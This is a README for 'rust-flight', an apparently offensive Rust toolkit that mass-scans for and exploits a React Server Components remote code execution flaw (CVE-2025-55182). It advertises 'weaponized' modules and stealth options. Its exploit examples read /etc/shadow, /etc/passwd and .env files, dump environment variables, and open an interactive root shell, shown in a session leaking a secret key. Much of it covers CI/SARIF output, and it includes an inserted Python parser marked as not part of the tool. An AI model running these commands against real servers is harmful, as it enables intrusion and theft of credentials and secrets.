High-performance security scanner and exploitation toolkit for CVE-2025-55182 (React Server Components RCE).
Built for security researchers, bug bounty hunters, and CI/CD pipelines. rust-flight combines fast async scanning with weaponized exploitation modules for the React Server Components prototype pollution vulnerability.
- 🚀 Mass Scanning — Async engine with configurable concurrency and rate limiting
- 🎯 Precision Detection — Regex-based rules to minimize false positives
- 💥 Weaponized Exploits — RCE, file read, and arbitrary JavaScript execution
- 🐚 Interactive Shell — Built-in exploitation REPL for manual testing
- 🛡️ Stealth — Proxy support, custom headers/cookies, and TLS bypass
- 📊 Multiple Output Formats — JSON, CSV, SARIF (for GitHub/GitLab), Markdown
- ⚡ Rate Limiting — Production-grade throttling with exponential backoff retries
- 📈 Progress Tracking — Real-time progress bar with ETA and statistics
Build from source:

```sh
cargo build --release
```

The binary will be available at `./target/release/rust-flight`.

Or build and run with Docker:

```sh
# Build image
docker build -t rust-flight .
# Run
docker run --rm rust-flight --help
docker run --rm rust-flight scan -u http://target.com
```

Quick start:

```sh
# Scan a single target
rust-flight scan -u http://target:3000
# Scan multiple targets from file
rust-flight scan -l targets.txt -c 20
# Scan from stdin (pipeline)
cat urls.txt | rust-flight scan
# Exploit a vulnerable target
rust-flight exploit -u http://target:3000 --cmd "id"
# Interactive shell
rust-flight shell -u http://target:3000
```

Scan one or more targets for CVE-2025-55182 vulnerabilities.
```
rust-flight scan [OPTIONS]
```

Target options:

| Option | Description |
|---|---|
| `-u, --url <URL>` | Single target URL |
| `-l, --list <FILE>` | File containing target URLs (one per line) |
| `-e, --endpoint <PATH>` | Server action endpoint (default: /formaction) |
| stdin | Automatically reads from stdin if piped |

Output options:

| Option | Description |
|---|---|
| `-o, --output <FILE>` | Write results to file |
| `--output-format <FMT>` | Format: json, csv, sarif, markdown (default: json) |
| `--silent` | Print only results (no banner/progress) |
| `-q, --quiet` | Suppress non-essential output |

HTTP options:

| Option | Description |
|---|---|
| `-H, --header <N:V>` | Custom header (repeatable) |
| `-b, --cookie <COOKIE>` | Cookie to include |
| `-x, --proxy <URL>` | Proxy URL (e.g., http://127.0.0.1:8080) |
| `--user-agent <UA>` | Custom User-Agent |
| `--timeout <SECS>` | Request timeout (default: 10) |
| `--insecure` | Accept invalid TLS certificates |

Rate limiting options:

| Option | Description |
|---|---|
| `-r, --rate <N>` | Max requests per second (default: 50, 0 = unlimited) |
| `-c, --concurrency <N>` | Concurrent workers (default: 10) |
| `--retries <N>` | Retry failed requests (default: 2) |
| `--delay <MS>` | Delay between requests in ms (default: 0) |
| `--stop-on-first` | Stop after finding first vulnerability |
```sh
# Basic scan
rust-flight scan -u http://target:3000
# Mass scan with rate limiting
rust-flight scan -l targets.txt -r 100 -c 20
# Output SARIF for GitHub Security
rust-flight scan -l targets.txt -o results.sarif --output-format sarif
# Scan through proxy with custom headers
rust-flight scan -u http://target:3000 \
  -x http://127.0.0.1:8080 \
  -H "Authorization: Bearer token" \
  -b "session=abc123"
# Pipeline mode
subfinder -d target.com | httpx | rust-flight scan --output-format json
```

Exploit a confirmed vulnerable target with RCE, file read, or custom JavaScript.
```
rust-flight exploit -u <URL> [--cmd | --read | --js] [OPTIONS]
```

Exploitation modes:

| Option | Description |
|---|---|
| `--cmd <COMMAND>` | Execute shell command |
| `--read <FILE>` | Read file from target filesystem |
| `--js <CODE>` | Execute arbitrary JavaScript |

Options:

| Option | Description |
|---|---|
| `-u, --url <URL>` | Target URL (required) |
| `-e, --endpoint <PATH>` | Server action endpoint (default: /formaction) |
| `--method <METHOD>` | Exploitation method: vm, child-process, fs (default: vm) |
| `-H, --header <N:V>` | Custom header (repeatable) |
| `-b, --cookie <COOKIE>` | Cookie to include |
| `-x, --proxy <URL>` | Proxy URL |
| `--timeout <SECS>` | Request timeout (default: 10) |
| `--insecure` | Accept invalid TLS certificates |
```sh
# Execute command
rust-flight exploit -u http://target:3000 --cmd "whoami"
rust-flight exploit -u http://target:3000 --cmd "cat /etc/shadow"
# Read files
rust-flight exploit -u http://target:3000 --read /etc/passwd
rust-flight exploit -u http://target:3000 --read /app/.env
# Execute JavaScript
rust-flight exploit -u http://target:3000 --js "process.env"
rust-flight exploit -u http://target:3000 --js "require('os').networkInterfaces()"
# Use different exploitation method
rust-flight exploit -u http://target:3000 --cmd "id" --method child-process
# Quiet mode (only output result)
rust-flight exploit -u http://target:3000 --cmd "id" -q
```

Start an interactive REPL for manual exploitation.
```
rust-flight shell -u <URL> [OPTIONS]
```

Example session:

```
$ rust-flight shell -u http://target:3000
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ rust-flight - Interactive Shell ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Target: http://target:3000/formaction
[*] Method: Vm
Type commands to execute. Prefix with 'js ' for JavaScript.
Type 'exit' to quit.
rce> id
uid=0(root) gid=0(root) groups=0(root)
rce> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
rce> js process.env.SECRET_KEY
s3cr3t_k3y_12345
rce> exit
```
Newline-delimited JSON (NDJSON) for easy parsing:

```sh
rust-flight scan -u http://target:3000 --output-format json
```

```
{"target":"http://target:3000/formaction","gadget":"VM RCE","vulnerable":true,"timestamp":"2024-12-04T10:30:00Z"}
{"target":"http://target:3000/formaction","gadget":"ExecSync","vulnerable":false,"timestamp":"2024-12-04T10:30:01Z"}
```

CSV:

```sh
rust-flight scan -l targets.txt -o results.csv --output-format csv
```

```
target,gadget,vulnerable,error,timestamp
http://target:3000/formaction,VM RCE,true,,2024-12-04T10:30:00Z
http://target:3000/formaction,ExecSync,false,,2024-12-04T10:30:01Z
```

SARIF 2.1.0 format for GitHub Advanced Security, GitLab SAST, and other CI/CD integrations:

```sh
rust-flight scan -l targets.txt -o results.sarif --output-format sarif
```

Upload to GitHub (the code-scanning SARIF endpoint also requires `commit_sha` and `ref`, and the base64 payload must be a single line):

```sh
gh api -X POST /repos/{owner}/{repo}/code-scanning/sarifs \
  -f commit_sha="$(git rev-parse HEAD)" \
  -f ref="refs/heads/$(git rev-parse --abbrev-ref HEAD)" \
  -f "sarif=$(gzip -c results.sarif | base64 | tr -d '\n')"
```

Human-readable report:

```sh
rust-flight scan -l targets.txt -o report.md --output-format markdown
```

rust-flight is designed for automation with meaningful exit codes and machine-readable output formats.
| Code | Status | Description |
|---|---|---|
| 0 | Clean | Scan completed, no vulnerabilities found |
| 1 | Error | Execution error (invalid arguments, network failure, etc.) |
| 2 | Vulnerable | One or more vulnerabilities detected |
| 3 | Partial | Scan completed with some failed targets |
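As an added example (not part of rust-flight), a small Python consumer for the NDJSON output shown above that groups findings per target and maps them onto the exit-code table; the third sample record and its `error` field are constructed assumptions about the JSON shape, and the precedence of "vulnerable" over "partial" is an assumption as well.

```python
import json
from collections import defaultdict

# Constructed sample of rust-flight's NDJSON output: the two records shown in this
# README plus a third with an "error" field (assumed to mirror the CSV error column).
SAMPLE_NDJSON = """\
{"target":"http://target:3000/formaction","gadget":"VM RCE","vulnerable":true,"timestamp":"2024-12-04T10:30:00Z"}
{"target":"http://target:3000/formaction","gadget":"ExecSync","vulnerable":false,"timestamp":"2024-12-04T10:30:01Z"}
{"target":"http://other:3000/formaction","gadget":"VM RCE","vulnerable":false,"error":"connection refused","timestamp":"2024-12-04T10:30:02Z"}
"""

# Exit-code values from the README's exit code table.
EXIT_CLEAN, EXIT_VULNERABLE, EXIT_PARTIAL = 0, 2, 3

def parse_ndjson(text):
    """Parse NDJSON records, skipping blank lines; a malformed line raises ValueError."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError as exc:
            raise ValueError(f"line {lineno}: {exc}") from None
    return records

def summarize(records):
    """Group records per target: gadgets that fired and probes that errored."""
    summary = defaultdict(lambda: {"gadgets": [], "errors": []})
    for rec in records:
        entry = summary[rec["target"]]
        if rec.get("vulnerable"):
            entry["gadgets"].append(rec["gadget"])
        if rec.get("error"):
            entry["errors"].append(rec["error"])
    return dict(summary)

def exit_code_for(summary):
    """Map a summary to the README's exit codes (vulnerable assumed to outrank partial)."""
    if any(e["gadgets"] for e in summary.values()):
        return EXIT_VULNERABLE
    if any(e["errors"] for e in summary.values()):
        return EXIT_PARTIAL
    return EXIT_CLEAN

def vulnerable_targets(summary):
    """Sorted list of endpoints that need patching, e.g. for a ticket or a WAF block list."""
    return sorted(t for t, e in summary.items() if e["gadgets"])
```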
Example wrapper script (under `set -euo pipefail` a non-zero scan exit would abort the script before the `case`, so the exit code is captured with `|| exit_code=$?`):

```bash
#!/bin/bash
set -euo pipefail
exit_code=0
rust-flight scan -l targets.txt -o results.sarif --output-format sarif || exit_code=$?
case $exit_code in
  0) echo "[+] Scan clean - no vulnerabilities found" ;;
  1) echo "[-] Scan error" && exit 1 ;;
  2) echo "[!] Vulnerabilities detected" && exit 1 ;;
  3) echo "[~] Partial results - some targets unreachable" ;;
esac
```

GitHub Actions:

```yaml
name: Security Scan
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run rust-flight scan
        run: rust-flight scan -l targets.txt -o results.sarif --output-format sarif
        continue-on-error: true
      - name: Upload SARIF to GitHub Security
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: results.sarif
```

GitLab CI:

```yaml
security_scan:
  stage: test
  script:
    - rust-flight scan -l targets.txt -o gl-sast-report.json --output-format sarif
  artifacts:
    reports:
      sast: gl-sast-report.json
  allow_failure: true
```

These options apply to all commands:
| Option | Description |
|---|---|
| `-v, --verbose` | Enable debug output |
| `-q, --quiet` | Suppress banner and non-essential output |
| `--no-color` | Disable colored output |
| `--debug-log <FILE>` | Write debug logs to file (JSON format) |
| `-h, --help` | Print help |
| `-V, --version` | Print version |
| Gadget | Module | Detection Method |
|---|---|---|
| VM RCE | vm#runInThisContext | Math expression evaluation |
| VM Sandbox Escape | vm#runInNewContext | Math expression evaluation |
| Command Execution | child_process#execSync | Echo marker detection |
| Command Execution | child_process#execFileSync | Echo marker detection |
| File Read | fs#readFileSync | /etc/passwd pattern match |
| Prototype Access | fs#constructor | JSON response heuristic |
License: MIT
This tool is intended for authorized security testing and research only.
Unauthorized access to computer systems is illegal. You are solely responsible for ensuring you have proper authorization before using this tool against any target. The authors assume no liability for misuse.
